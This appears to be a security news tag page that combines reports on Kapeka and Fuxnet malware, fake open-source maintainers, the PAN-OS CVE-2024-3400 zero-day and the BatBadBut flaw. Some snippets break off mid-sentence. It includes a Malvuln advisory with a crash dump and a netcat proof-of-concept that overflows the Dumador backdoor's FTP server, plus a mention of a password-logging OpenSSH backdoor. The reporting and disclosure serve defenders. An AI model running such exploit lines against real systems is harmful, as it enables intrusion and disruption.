"Kapeka" and "Fuxnet" are the latest examples of malware to emerge from the long-standing conflict between the two countries.

Source: Andrew Angelov via Shutterstock

Two dangerous malware tools targeted at industrial control systems (ICS) and operating technology (OT) environments in Europe are the latest manifestations of the cyber fallout from the war in Ukraine.

One of the tools, dubbed "Kapeka," appears linked to Sandworm, a prolific Russian state-backed threat actor that Google's Mandiant security group this week described as the country's primary cyberattack unit in Ukraine. Security researchers from Finland-based WithSecure spotted the backdoor featured in 2023 attacks against an Estonian logistics company and other targets in Eastern Europe and perceive it as an active and ongoing threat.

**Destructive Malware**

The other malware — somewhat colorfully dubbed Fuxnet — is a tool that Ukraine government-backed threat group Blackjack likely used in a recent, destructive attack against Moskollector, a company that maintains a large network of sensors for monitoring Moscow's sewage system. The attackers used Fuxnet to successfully brick what they claimed was a total of 1,700 sensor-gateways on Moskollector's network and in the process disabled some 87,000 sensors connected to these gateways.

"The main functionality of the Fuxnet ICS malware was corrupting and blocking access to sensor gateways, and trying to corrupt the physical sensors as well," says Sharon Brizinov, director of vulnerability research at ICS security firm Claroty, which recently investigated Blackjack's attack. As a result of the attack, Moskollector will likely have to physically reach each of the thousands of affected devices and replace them individually, Brizinov says. "To restore \[Moskollector's\] ability of monitoring and operating the sewage system all around Moscow, they will need to procure and reset the entire system."

Kapeka and Fuxnet are examples of the broader cyber fallout from the conflict between Russia and Ukraine. Since the war between the two countries started in February 2022 — and even well before that — hacker groups from both sides developed and used a range of malware tools against each other. Many of the tools, including wipers and ransomware, have been destructive or disruptive in nature and mainly targeted critical infrastructure, ICS, and OT environments in both countries.

But on several occasions, attacks involving tools spawned from the long-standing conflict between the two countries have affected a broader swath of victims. The most notable example remains NotPetya, a malware tool that the Sandworm group originally developed for use in Ukraine, but which ended up impacting tens of thousands of systems worldwide in 2017. In 2023, the UK's National Cyber Security Centre (NCSC) and the US National Security Agency (NSA) warned of a Sandworm malware toolset dubbed "Infamous Chisel" posing a threat to Android users everywhere.

**Kapeka: A Sandworm Replacement for GreyEnergy?**

According to WithSecure, Kapeka is a novel backdoor that attackers can use as an early stage toolkit and for enabling long-term persistence on a victim system. The malware includes a dropper component for dropping the backdoor on a target machine and then removing itself. "Kapeka supports all basic functionalities that allow it to operate as a flexible backdoor in the victim's estate," says Mohammad Kazem Hassan Nejad, a researcher at WithSecure.

Its capabilities include reading and writing files from and to disk, executing shell commands, and launching malicious payloads and processes including living-off-the-land binaries. "After gaining initial access, Kapeka's operator can utilize the backdoor to perform a wide variety of tasks on the victim's machine, such as discovery, deploying additional malware, and staging next stages of their attack," Nejad says.

According to Nejad, WithSecure was able to find evidence suggesting a connection to Sandworm and the group's GreyEnergy malware used in attacks on Ukraine's power grid in 2018. "We believe Kapeka may be a replacement for GreyEnergy in Sandworm's arsenal," Nejad notes. Though the two malware samples do not originate from the same source code, there are some conceptual overlaps between Kapeka and GreyEnergy, just as there were some overlaps between GreyEnergy and its predecessor, BlackEnergy. "This indicates that Sandworm may have upgraded their arsenal with new tooling over time to adapt with the changing threat landscape," Nejad says.

**Fuxnet: A Tool to Disrupt and Destroy**

Meanwhile, Claroty's Brizinov identifies Fuxnet as ICS malware intended to cause damage to specific Russian-made sensor equipment. The malware is meant for deploying on gateways that monitor and collect data from physical sensors for fire alarms, gas monitoring, lighting, and similar use cases.

"Once the malware is deployed, it will brick the gateways by overwriting its NAND chip and disabling external remote access capabilities, preventing operators from remotely controlling the devices," Brizinov says.  

A separate module then attempts to flood the physical sensors themselves with useless M-Bus traffic. M-Bus is a European communications protocol for remotely reading gas, water, electric, and other meters. "One of the main purposes of Blackjack’s Fuxnet ICS malware \[is\] to attack and destroy the physical sensors themselves after gaining access to the sensor gateway," Brizinov says. To do so, Blackjack chose to fuzz the sensors by sending them an unlimited number of M-Bus packets. "In essence, BlackJack hoped that by endlessly sending the sensor random M-Bus packets, the packets would overwhelm them and potentially trigger a vulnerability that would corrupt the sensors and place them in an inoperable state," he says.

The key takeaway for organizations from such attacks is to pay attention to the security basics. Blackjack, for instance, appears to have gained root access to target sensor-gateways by abusing weak credentials on the devices. The attack highlights why it "is important to uphold a good password policy, making sure devices do not share the same credentials or use default ones," he says. "It is also important to deploy good network sanitization and segmentation, making sure attackers would not be able to move laterally inside the network, and deploy their malware to all edge devices."

**About the Author(s)**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Dangerous ICS Malware Targets Orgs in Russia and Ukraine

A previously undocumented "flexible" backdoor called Kapeka has been "sporadically" observed in cyber attacks targeting Eastern Europe, including Estonia and Ukraine, since at least mid-2022.
The findings come from Finnish cybersecurity firm WithSecure, which attributed the malware to the Russia-linked advanced persistent threat (APT) group tracked as Sandworm (aka APT44 or

Russian APT Deploys New 'Kapeka' Backdoor in Eastern European Attacks

Backdoor.Win32.Dumador.c malware suffers from a buffer overflow vulnerability.

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024  
Original source: https://malvuln.com/advisory/6cc630843cabf23621375830df474bc5.txt  
Contact: malvuln13@gmail.com  
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Dumador.c  
Vulnerability: Remote Stack Buffer Overflow (SEH)  
Description: The malware runs an FTP server on TCP port 10000. Third-party adversaries who can reach the server can send a specially crafted payload triggering a stack buffer overflow overwriting the Structured Exception Handler (SEH).  
Family: Dumador  
Type: PE32  
MD5: 6cc630843cabf23621375830df474bc5  
SHA256: 634eb7d9f5488b46ac44d784da8d82d98a8d86c1c8ef9a838535d44b8e420ea9  
Vuln ID: MVID-2024-0679  
ASLR: False  
DEP: False  
CFG: False  
Safe SEH: False  
Disclosure: 04/15/2024

Memory Dump:  
(16e0.150): Stack buffer overflow - code c0000409 (first/second chance not available)  
eax=00000000 ebx=00000000 ecx=0401fe41 edx=0401fbf0 esi=00000000 edi=00000002  
eip=775ced3c esp=0401f208 ebp=0401f248 iopl=0         nv up ei pl nz na po nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202  
ntdll!ZwWaitForMultipleObjects+0xc:  
775ced3c c21400          ret     14h

0:002> .ecxr  
eax=0401fec8 ebx=00000000 ecx=0401fe41 edx=0401fbf0 esi=00000410 edi=00000194  
eip=74657c7c esp=0401f8b8 ebp=0401f8e0 iopl=0         nv up ei pl nz na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206  
kernel32!lstrcpyA+0x1c:  
74657c7c 880c16          mov     byte ptr [esi+edx],cl      ds:002b:04020000=??  
*** WARNING: Unable to verify checksum for Backdoor.Win32.Dumador.c.6cc630843cabf23621375830df474bc5.exe  
*** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.Dumador.c.6cc630843cabf23621375830df474bc5.exe

0:002> !analyze -v  
*******************************************************************************  
*                                                                             *  
*                        Exception Analysis                                   *  
*                                                                             *  
*******************************************************************************

FAULTING_IP:   
kernel32!lstrcpyA+1c  
74657c7c 880c16          mov     byte ptr [esi+edx],cl

EXCEPTION_RECORD:  0401f408 -- (.exr 0x401f408)  
ExceptionAddress: 74657c7c (kernel32!lstrcpyA+0x0000001c)  
   ExceptionCode: c0000005 (Access violation)  
  ExceptionFlags: 00000008  
NumberParameters: 2  
   Parameter[0]: 00000001  
   Parameter[1]: 04020000  
Attempt to write to address 04020000

PROCESS_NAME:  Backdoor.Win32.Dumador.c.6cc630843cabf23621375830df474bc5.exe

ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_PARAMETER1:  00000015

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

CONTEXT:  0401f458 -- (.cxr 0x401f458)  
eax=0401fec8 ebx=00000000 ecx=0401fe41 edx=0401fbf0 esi=00000410 edi=00000194  
eip=74657c7c esp=0401f8b8 ebp=0401f8e0 iopl=0         nv up ei pl nz na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206  
kernel32!lstrcpyA+0x1c:  
74657c7c 880c16          mov     byte ptr [esi+edx],cl      ds:002b:04020000=??  
Resetting default scope

WRITE_ADDRESS:  04020000 

FOLLOWUP_IP:   
kernel32!lstrcpyA+1c  
74657c7c 880c16          mov     byte ptr [esi+edx],cl

STACK_ADDR_RAW_STACK_SYMBOL: 401fa34

ADDITIONAL_DEBUG_TEXT:  Followup set based on attribute [Is_ChosenCrashFollowupThread] from Frame:[0] on thread:[PSEUDO_THREAD]

LAST_CONTROL_TRANSFER:  from 00401bf3 to 74657c7c

FAULTING_THREAD:  ffffffff

DEFAULT_BUCKET_ID:  STACKIMMUNE

PRIMARY_PROBLEM_CLASS:  STACKIMMUNE

BUGCHECK_STR:  APPLICATION_FAULT_STACKIMMUNE_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE

STACK_TEXT:    
00000000 00000000 unknown!backdoor.win32.dumador.c.6cc630843cabf23621375830df474bc5.exe+0x0

STACK_COMMAND:  .cxr 000000000401F458 ; kb ; ** Pseudo Context ** ; kb

SYMBOL_NAME:  unknown!backdoor.win32.dumador.c.6cc630843cabf23621375830df474bc5.exe

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: unknown

IMAGE_NAME:  unknown

DEBUG_FLR_IMAGE_TIMESTAMP:  0

FAILURE_BUCKET_ID:  STACKIMMUNE_c0000409_unknown!Unloaded

BUCKET_ID:  APPLICATION_FAULT_STACKIMMUNE_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE_MISSING_GSFRAME_unknown!backdoor.win32.dumador.c.6cc630843cabf23621375830df474bc5.exe

Followup: MachineOwner  
---------

0:002> !exchain  
0401f2c0: ntdll!_except_handler4+0 (775d6a50)  
  CRT scope  0, func:   ntdll!RtlReportExceptionHelper+251 (776157ad)  
0401f8d0: kernel32!_except_handler4+0 (7466d450)  
  CRT scope  0, filter: kernel32!lstrcpyA+2d (74657c8d)  
                func:   kernel32!lstrcpyA+40 (74657ca0)  
0401ffcc: 41414141  
Invalid exception stack at 41414141

Exploit/PoC:  
python -c "print('A'*2000)" | nc64.exe x.x.x.x 10000  
220 CONNECTED  
ERROR  
ERROR  
ERROR

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Dumador.c MVID-2024-0679 Buffer Overflow

By Deeba Ahmed
Alarming social engineering attacks target critical open-source projects! Learn how to protect your project and the open-source community from takeovers.
This is a post from HackRead.com Read the original post: OpenSSF Warns of Fake Maintainers Targeting JavaScript Projects

The open-source software community, the foundation of modern technology, is facing a growing threat from social engineering attacks. The Open Source Security (OpenSSF) and OpenJS Foundations issued alerts for social engineering takeovers of open-source projects after unknown malicious actors tried to gain control of an OpenJS-hosted project.

****The Attack****

The OpenJS Foundation Cross Project Council, which hosts popular JavaScript projects used by billions of websites, recently received a series of emails requesting updates to one of its popular JavaScript projects for addressing critical vulnerabilities, with no specifics. The authors wanted OpenJS to designate them as new maintainers although none had privileged access to the project. 

The good news, according to OpenSSF’s blog post, is that the OpenJS Foundation had effective security measures in place, which prevented unauthorized access to the project. The Foundation, demonstrating commendable proactiveness, reported the incident to the Cybersecurity and Infrastructure Security Agency (CISA) and the Department of Homeland Security.

This approach resembles a recent incident involving the XZ Utils project, a popular data compression tool, where a malicious actor named Jia Tan infiltrated it by gaining the trust of its maintainer. The attack involved claims of expertise and malicious code insertion.

Soon after, a backdoor in xz/liblzma was discovered on the oss-security mailing list, affecting xz compression tools and libraries with versions 5.6.0 and 5.6.1. Fortunately, the compromise was discovered before widespread damage occurred.

Open-source software can pose threats to any part of the supply chain, but the community’s due diligence and oversight can always ensure quick detection and resolution. 

Open-source maintainers should be cautious against social engineering by implementing measures like Multi-Factor Authentication (MFA), granting contributors the right access, conducting rigorous code reviews, fostering a strong community, and being wary of unsolicited help. Limiting privileges can add additional security, while also being cautious of individuals offering “critical” updates or requesting access.

****Open Source Tools = Lucrative Target****

Over 30 million open-source projects are hosted on the GitHub platform, highlighting their widespread adoption by individuals and businesses. However, this vast number also makes these projects lucrative targets for cybercriminals.

For instance, a few months ago, a new hacker group called GambleForce was discovered exploiting open-source tools to compromise their targets successfully. This has encouraged initiatives such as bug bounty programs from Google and the EU (European Union) specifically for Open Source tools.

****Experts Opinion****

Chris Hughes – chief security advisor at open source security company, Endor Labs and Cyber Innovation Fellow at CISA, where he focuses on supply chain security – says these attack attempts are not surprising, but they do raise awareness of bigger OSS security issues.

“It is not surprising at all to hear about these increased social engineering takeover attempts and these will increase with the recent xz utilities example providing insight to malicious actors on how to conduct this attack, in fact we can likely suspect that many of these are already underway and may have already been successful but haven’t been exposed or identified yet. ” Chris warned.

1.  Enhancing Team Coordination With Open-Source Tools
2.  Patched OpenSSH Exploited for IoT, Linux Cryptomining
3.  Dark Web Pedophiles Using Open-Source AI to Generate CSAM
4.  Use of open-source libraries left web apps vulnerable to attacks

OpenSSF Warns of Fake Maintainers Targeting JavaScript Projects

A sophisticated threat actor is leveraging the bug to deploy a Python backdoor for stealing data and executing other malicious actions.

Source: Tada Images via Shutterstock

Palo Alto Networks (PAN) on April 14 released hotfixes to address a maximum severity zero-day bug in multiple versions of its PAN-OS software that a threat actor is using to deploy a novel Python backdoor on affected firewalls.

The flaw — tracked as CVE-2024-3400 — is present in PAN-OS 10.2, 11.0, and 11.1 firewalls when the GlobalProtect Gateway and device telemetry features are both enabled. PAN disclosed the flaw April 12 after researchers at Volexity found the bug when investigating suspicious activity on a customer's firewall.  

**Limited Attack**

PAN described the attacks targeting the flaw as limited in volume and attributed the attack activity to a single threat cluster that the company is tracking as "Operation Midnight Eclipse." However, the vendor did not rule out the potential for other attackers to exploit the flaw as well.   

When PAN disclosed the flaw last week, it recommended temporary measures that customers could take to mitigate the threat — including disabling device telemetry. On April 14, the company made available hotfix releases of PAN-OS 10.2.9-h1, PAN-OS 11.0.4-h1, PAN-OS 11.1.2-h3, and all later PAN-OS versions. The security vendor urged customers to apply the updates and promised similar hotfixes for other maintenance releases of the software.

Reports of attackers targeting the flaw before a patch was available prompted the US Cybersecurity and Infrastructure Agency (CISA) last week to quickly add CVE-2024-3400 to its catalog of known exploited vulnerabilities. All civilian federal agencies have until April 19 to address the flaw. CISA has previously warned organizations on multiple occasions about high threat-actor interest in VPNs and other remote access technologies from vendors such as Pulse Secure, Cisco, and PAN because of the privileged access these devices provide to enterprise networks and data.

**Max Severity Command Injection Flaw**

In a blog post last week, Volexity described the flaw it discovered as a command injection vulnerability in PAN-OS GlobalProtect that gave unauthenticated remote attackers a way to execute arbitrary code on affected systems. The security vendor said it had observed an attacker — which it's tracking as UTA0218 — leveraging the flaw to create a reverse shell and download additional malware on compromised systems.

"The attacker focused on exporting configuration data from the devices, and then leveraging it as an entry point to move laterally within the victim organizations," Volexity said.

One of the additional tools that the threat actor deployed on compromised systems was a novel Python backdoor that Volexity has named Upstyle. The security vendor said it found the threat actor using the Upstyle backdoor to execute a variety of additional commands including those for lateral movement within a target network and to steal credentials and other sensitive data from it.

"The tradecraft and speed employed by the attacker suggests a highly capable threat actor with a clear playbook of what to access to further their objectives," Volexity warned. Volexity said it was not able to determine the exact scale of the exploit activity but surmised it was likely limited and targeted. The company said it had found evidence of UTA0218 attempting to exploit the vulnerability at multiple organizations on March 26 and March 27.

PAN said its analysis showed the threat actor using the backdoor to run a handful of commands on vulnerable firewalls. The commands included one for copying configuration files and exfiltrating them via HTTP requests and another that set up the firewall to receive even more commands, this time from a different URL. "Lastly, the threat actor cleaned up after themselves by removing all files associated with the backdoors and clearing their cronjobs," PAN said.

**Complete Control**

Karl Sigler, senior security research manager at Trustwave's SpiderLabs, says exploiting CVE-2024-3400 would give an attacker complete control over the PAN device. "This could allow the attacker a foothold to pivot further into the organization," he says. "It could also allow the attacker to disable protections provided by the device, including disabling access control lists and VPN connections."

Sigler says the vulnerability exploit in this case works by getting an affected device to log OS commands in an error log. These commands are then processed and executed with root-level permissions, he says. "Disabling device telemetry disables the log file, short-circuiting the attack," Sigler notes. "The main risk in doing so is that network admins often rely on this telemetry to troubleshoot problems with the device. Additionally, monitoring for abnormal network behavior may be evidence of an ongoing attack. Disabling telemetry may hinder those efforts."

Palo Alto itself has recommended that organizations that are unable to immediately update their software for any reason should disable device telemetry till they are able to update. According to the company, "Once upgraded, device telemetry should be re-enabled on the device."

**About the Author(s)**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Palo Alto Network Issues Hotfixes for Zero-Day Bug in Its Firewall OS

By Deeba Ahmed
Firewall on fire!
This is a post from HackRead.com Read the original post: Palo Alto Patches 0-Day (CVE-2024-3400) Exploited by Python Backdoor

Palo Alto Networks issues critical patches for a zero-day vulnerability (CVE-2024-3400) in their PAN-OS firewalls. Exploited by attackers to deploy Python backdoors, this flaw grants root access. Update immediately!

In a race against time, Palo Alto Networks has released patches for a critical 0-day (or zero-day) vulnerability (CVE-2024-3400) that threatened to leave firewalls exposed to cyberattacks.

According to Palo Alto Networks’ security advisory, the vulnerability was found in its PAN-OS operating system’s GlobalProtect functionality, related to the way it handled device telemetry data. 

An attacker could exploit this flaw by crafting a malicious payload disguised as telemetry data.  Once processed by the firewall, the payload could execute arbitrary code with root privileges, essentially giving the attacker complete control over the device. 

****Which Devices Are Vulnerable?****

Appliances with GlobalProtect and device telemetry enabled are declared vulnerable. The Shodan search engine for exposed Internet of Things (IoT) devices reveals approximately 41,336 potentially impacted internet-exposed appliances of Palo Alto Networks.

SecurityWeek reports that several organizations have already fallen victim to targeting, with certain attackers endeavouring to deploy Upstyle, a fresh Python backdoor.

****Possible Dangers****

Like any other security vulnerability, this one also lets hackers exploit and establish backdoors, launch lateral attacks, steal sensitive data, and disrupt network operations. Threat actors can also create persistent access points, use the compromised firewall as a springboard, and gain access to confidential information.

Additionally, it may allow hackers to take full control of the firewall’s functionality, potentially leading to network outages or traffic manipulation.

****Detection and Patching:****

The good news is that the vulnerability was identified and patched relatively quickly. Security firm Volexity first detected the exploit in use in late March 2024, observing a threat actor UTA0218 remotely exploiting a firewall device.

The researchers also observed how the threat actor created a reverse shell, downloading additional tools, and exporting configuration data to use it as an entry point for lateral movement. Volexity swiftly alerted Palo Alto Networks, which issued security alerts and hotfixes to address the vulnerability for PAN-OS versions 10.2, 11.0, and 11.1.

Palo Alto Networks suggests that if customers can’t implement the Threat Prevention-based mitigation immediately, you can still reduce the impact of the vulnerability by temporarily turning off device telemetry until the device is updated to a PAN-OS version that addresses the issue.

> _“If you are unable to apply the Threat Prevention based mitigation at this time, you can still mitigate the impact of this vulnerability by temporarily disabling device telemetry until the device is upgraded to a fixed PAN-OS version. Once upgraded, device telemetry should be re-enabled on the device. If the firewalls are managed by Panorama, ensure that device telemetry is disabled in relevant templates (Panorama > Templates).”_
> 
> Palo Alto Networks

****Who Was Behind the Attacks?****

As per Volexity’s blog post, the zero-day exploit was highly sophisticated and targeted specific configurations, suggesting a well-resourced state-sponsored attacker with a clear target in mind could be involved.

Initial attribution attempts point towards Lazarus Group, a notorious hacking group believed to be affiliated with North Korea and BianLian, which targets critical infrastructure organizations. Nevertheless, Palo Alto Networks has urged all users to update their PAN-OS software immediately.

1.  Hackers dump login data of Fortinet VPN users in plain-text
2.  Private details of Palo Alto Networks employees leaked online
3.  Cisco Fixes High-Severity Code Execution, VPN Hijacking Flaws

Palo Alto Patches 0-Day (CVE-2024-3400) Exploited by Python Backdoor

This is a backdoored version of openssh-8.0p1 where the ssh client will log the ssh username and ssh password into /opt/.../log.txt.

OpenSSH 8 Password Backdoor

By Deeba Ahmed
Critical 'BatBadBut' Flaw in Windows Lets Hackers Inject Commands (Patch Now!)
This is a post from HackRead.com Read the original post: Windows Apps Vulnerable to Command Injection via “BatBadBut” Flaw

Flatt Security has discovered a critical vulnerability called “BatBadBut” that could allow attackers to inject malicious commands into Windows applications. The flaw, discovered by Flatt Security’s security engineer RyotaK, affects multiple programming languages. It was reported to the CERT Coordination Center and registered as CVE-2024-24576 on GitHub with a severity score of 10.0.

****What’s the Issue?****

Windows Rust developers are being urged to update their versions due to a critical vulnerability called ‘BatBadBut’, which could lead to malicious command injections on machines. The vulnerability affects the Rust standard library, which improperly escaped arguments when invoking batch files on Windows using the Command API.

BatBadBut vulnerability allows attackers to inject commands into Windows applications that rely on the ‘CreateProcess’ function. This is because cmd.exe, which executes batch files, has complex parsing rules and programming language runtimes fail to escape command arguments properly.

****Why it Occurs?****

The ‘BatBadBut’ issue occurs from the interaction between programming languages and the Windows operating system. When a program calls the “CreateProcess” function, Windows launches a separate process, “cmd.exe,” to handle the execution. This separate process parses the commands in the .bat file. 

For your information, Windows by default includes .bat and.cmd files in the PATHEXT environment variable, which can cause runtimes to execute batch files against developers’ intentions. An attacker can inject commands into Windows applications by controlling the command arguments section of batch files. To do this, the application must execute a command on Windows, specify the command file extension, control the command arguments, and fail to escape them.

“Some runtimes execute batch files against the developers’ intention if there is a batch file with the same name as the command that the developer intended to execute,” ” Ryotak explained.

****Impacted Applications****

Haskell process library, Rust, Node.js, PHP, and yt-dlp are affected by this bug. The Rust Security Response Working Group was notified on April 9 2024 that the Rust standard library, which is used to invoke batch files on Windows, is not properly escaping arguments, allowing attackers to execute arbitrary shell commands by bypassing the escaping. Haskell, Rust, and yt-dlp have issued patches.  

Ryotak reports that this isn’t an “internet breaking vulnerability” and most applications are not affected by it with several mitigations already available. Some programming languages have addressed it by adding an escaping mechanism. In addition, BatBadBut only affects Rust versions before 1.77.2, affecting no other platform or use.

****Mitigation Strategies:****

Researchers advise developers to exercise caution when using functions that interact with external processes, especially when dealing with user-supplied data. They recommend validating and sanitizing user input before incorporating it into commands, using safe alternatives, and staying updated with the latest security patches and fixes provided by framework and library developers.

1.  Rust-Based macOS Backdoor Linked to Ransomware Gangs
2.  Windows Defender SmartScreen Flaw Exploited with Malware
3.  Rust-Based Injector Deploys Remcos RAT in Multi-Stage Attack

Windows Apps Vulnerable to Command Injection via “BatBadBut” Flaw

Threat actors have been exploiting the newly disclosed zero-day flaw in Palo
  Alto Networks PAN-OS software dating back to March 26, 2024, nearly three
  weeks before it came to light yesterday.



  The network security company's Unit 42 division is tracking the activity under the name Operation MidnightEclipse, attributing it as the work of a single threat actor of

Hackers Deploy Python Backdoor in Palo Alto Zero-Day Attack

Our collection of the most relevant reporting and industry perspectives for those guiding cybersecurity strategies and focused on SecOps. Also included: facing hard truths in software security, and the latest guidance from the NSA.

Source: Chroma Craft Media Group via Alamy Stock Photo

Welcome to CISO Corner, Dark Reading's weekly digest of articles tailored specifically to security operations readers and security leaders. Every week, we offer articles gleaned from across our news operation, The Edge, DR Technology, DR Global, and our Commentary section. We're committed to bringing you a diverse set of perspectives to support the job of operationalizing cybersecurity strategies, for leaders at organizations of all shapes and sizes.

**In this issue of CISO Corner**

*   The Race for AI-Powered Security Platforms Heats Up
    
*   Why MLBOMs Are Useful for Securing the AI/ML Supply Chain
    
*   The Fight for Cybersecurity Awareness
    
*   Ambitious Training Initiative Taps Talents of Blind and Visually Impaired
    
*   Vietnamese Cybercrime Group CoralRaider Nets Financial Data
    
*   XZ Utils Scare Exposes Hard Truths About Software Security
    
*   NSA Updates Zero-Trust Advice to Reduce Attack Surfaces
    

**The Race for AI-Powered Security Platforms Heats Up**

By Robert Lemos, Contributing Writer, Dark Reading

Microsoft, Google, and Simbian each offers generative AI systems that allow security operations teams to use natural language to automate cybersecurity tasks.

Both Google and Microsoft have committed massive resources to developing generative artificial intelligence (AI) tools for cybersecurity. Security Copilot from Microsoft can find breaches, gather, and analyze data with help from generative AI. Google's Gemini in Security is a similar rival service.

Now a startup has entered the fray, Simbian, with its own system that leverages generative AI as well as large language models (LLMs) to help security teams by automating configuring event management systems (SIEM) or security orchestration, automation, and response (SOAR).

While each offering has its own set of benefits, they all strive to streamline processes for strained cybersecurity teams. The question that has yet to be answered is whether teams will ultimately trust the automated systems to operate as intended.

Read more: The Race for AI-Powered Security Platforms Heats Up

Related: How AI and Automation Can Help Bridge the Cybersecurity Talent Gap

**Why MLBOMs Are Useful for Securing the AI/ML Supply Chain**

Commentary By Diana Kelley, CISO, Protect AI

A machine learning bill of materials (MLBOM) framework can bring transparency, auditability, control, and forensic insight into AI and ML supply chains.

The software bill of materials (SBOM) has become an essential tool for identifying the code that makes up an application, but in the age of artificial intelligence (AI) the SBOM has some limitations in machine learning frameworks.

A machine learning software bill of materials, or MLBOM, could fill the gaps left in a traditional SBOM and add protections to data and assets.

Read More: Why MLBOMs Are Useful for Securing the AI/ML Supply Chain

Related: Where SBOMs Stand Today

**  
The Fight for Cybersecurity Awareness**

Commentary By Erik Gross, CISO, QAD

Investing in cybersecurity skills creates a safer digital world for everyone.

Spreading awareness of risk is the best way to mitigate cybersecurity risk, but the task of constantly training and re-training people on the latest threats can be daunting. The age of artificial intelligence is making it even more difficult.

Building a culture of security is paramount, and it can be achieved with thoughtful cybersecurity training with a focus on a personal approach, storytelling, and helping people feel comfortable talking openly about cybersecurity. Humans are unpredictable, and a cybersecurity training process that accepts that humans are complex creatures have had the most success.

Read More: The Fight for Cybersecurity Awareness

Related: Q&A: The Cybersecurity Training Gap in Industrial Networks

**Ambitious Training Initiative Taps Talents of Blind and Visually Impaired**

By Jennifer Lawinski, Contributing Writer, Dark Reading

Novacoast's Apex Program prepares individuals with visual impairments for cybersecurity careers.

Blind and visually impaired (BVI) people are an untapped talent resource for cybersecurity companies struggling to attract talent. With just a computer outfitted with a screen reader and Braille keyboard, BVI people can become valuable contributors. Two cyber CEOs have launched Apex Program, an online, on-demand course for BVI people who want to break into cybersecurity.

So far, four students have completed the course and one has already landed a job as a SOC 1 Analyst. Now the White House is getting involved, and there's even a short film in the works featuring the Apex Program.

Read More: Ambitious Training Initiative Taps Talents of Blind and Visually Impaired

Related: 3 Ways Businesses Can Overcome the Cybersecurity Skills Shortage

**Vietnamese Cybercrime Group CoralRaider Nets Financial Data**

By Robert Lemos, Contributing Writer, Dark Reading

With a complex attack chain and using Telegram for its command and control, CoralRaider targets victims in Asian countries — and appears to have accidentally infected itself as well.

A newcomer on the Vietnamese cybercrime scene, a group called CoralRaider is making moves — and rookie mistakes like infecting their own systems — along the way.

Security researchers at Cisco Talos have been tracking CoralRaider's activities and found they are motivated by profit, even though the group is having trouble getting their operation off the ground. So far, Cisco Talos analysts haven't seen any indication CoralRaider has yet successfully delivered a payload, but the group is actively working to improve their cybercrime skills.

Read More: Vietnamese Cybercrime Group CoralRaider Nets Financial Data

Related: Ransomware, Junk Bank Accounts: Cyber Threats Proliferate in Vietnam

**  
XZ Utils Scare Exposes Hard Truths About Software Security**

By Jai Vijayan, Contributing Writer, Dark Reading

Much of the open source code embedded in enterprise software stacks comes from small, under-resourced, volunteer-run projects.

The backdoor recently discovered in the XZ Utils tool should be a wake-up call for cyber teams that open source repositories are riddled with vulnerabilities.

These projects are volunteer-run, under-resourced, and unable to keep up with the latest threats. XZ Utils is itself a one-person operation. Enterprises using code from these open sources do so at their own risk.

Organizations are advised to vet their use of code from public repositories and determine whether they have appropriate security controls. Experts also recommend having engineering and cybersecurity teams define processes and roles for onboarding open source code.

Read More: XZ Utils Scare Exposes Hard Truths About Software Security

**NSA Updates Zero-Trust Advice to Reduce Attack Surfaces**

By Dark Reading Staff

Agency encourages broader use of encryption, data-loss prevention, as well as data rights management to safeguard data, networks, and users.

In its ongoing effort to provide both the public, as well as the private, sectors with support in getting on a path to zero trust, the National Security Administration has issued guidance related to data protection, or as NSA categorizes it, the "data pillar." Recommendations from the agency include the use of encryption, tagging, labeling, and more.

Prior to this data security guidance, NSA provided a detailed guide to network macro- and micro-segmentation and its role in building up a zero-trust framework.

Read More: NSA Updates Zero-Trust Advice to Reduce Attack Surfaces

Related: NSA's Zero-Trust Guidelines Focus on Segmentation

Tag

#backdoor